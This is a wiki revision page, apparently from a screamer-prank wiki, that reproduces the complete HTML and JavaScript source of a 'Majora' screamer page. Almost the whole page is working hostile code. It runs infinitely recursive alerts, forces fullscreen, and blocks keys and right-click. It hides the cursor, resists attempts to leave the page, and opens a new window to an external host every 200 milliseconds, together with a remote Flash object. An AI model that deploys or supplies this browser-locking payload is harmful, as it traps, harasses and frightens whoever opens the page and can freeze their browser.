Screamer Forums and Screamer gallery have returned.
The Screamer Forums will likely remain read only unless it's known that it will be active, since forums in general are kind of dead because of Discord.
Majora/SourceCode: Difference between revisions
Jump to navigation
Jump to search
Tankmanfan44 (talk | contribs) Created page with "<pre> <!DOCTYPE html> <html> <head> <title>You shouldn't have done that.</title> <meta charset="utf-8"> <script> function ben(){alert("You've met with a terrible fate, haven't you ?"),ben()} function full(){document.body.requestFullScreen?document.body.requestFullScreen():document.body.webkitRequestFullScreen?document.body.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT):document.body.mozRequestFullScreen&&document.body.mozRequestFullScreen()} window.onbeforeun..." |
Tankmanfan44 (talk | contribs) m Protected "Majora/SourceCode" ([Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite)) |
||
(No difference)
| |||
Latest revision as of 07:55, 9 May 2025
<!DOCTYPE html>
<html>
<head>
<title>You shouldn't have done that.</title>
<meta charset="utf-8">
<script>
function ben(){alert("You've met with a terrible fate, haven't you ?"),ben()}
function full(){document.body.requestFullScreen?document.body.requestFullScreen():document.body.webkitRequestFullScreen?document.body.webkitRequestFullScreen(Element.ALLOW_KEYBOARD_INPUT):document.body.mozRequestFullScreen&&document.body.mozRequestFullScreen()}
window.onbeforeunload=function(){return ben(),"You've met with a terrible fate, haven't you ?"},
window.onclick=function(){return full(),"You've met with a terrible fate, haven't you ?"},
window.onunload=function(){return ben(),"You've met with a terrible fate, haven't you ?"},
window.onbeforeunload=function(){return ben(),"You've met with a terrible fate, haven't you ?"},
window.onkeypress=function(e){e.preventDefault(),full()},
window.onkeydown=function(e){e.preventDefault(),full()},
window.onkeyup=function(e){e.preventDefault(),full()}
document.oncontextmenu = new Function("return false");
setInterval(function(){majora()},200);
function majora() { window.open('http://bendrowned.olympe.in/majora','_blank'); majora() }
document.onkeydown=majora;
document.onkeyup=majora;
document.onkeypress=majora;
</script>
<style type="text/css">
body
{
margin: 0;
padding: 0;
-webkit-background-size: cover;
-moz-background-size: cover;
-o-background-size: cover;
background-size: cover;
background-color: black;
}
#nocursor
{
cursor: none;
top: 0;
left: 0;
width: 100%;
height: 100%;
position: fixed;
}
</style>
</head>
<body onbeforeunload="return('You\'ve met with a terrible fate, haven\'t you ?')" onclick="majora()">
<div id="nocursor"></div>
<object type="application/x-shockwave-flash" data="http://bendrowned.olympe.in/majora/majora2.swf" width="1600" height="800">
<param name="movie" value="majora2.swf"/>
<param name="quality" value="high"/>
</object>
</body>
</html>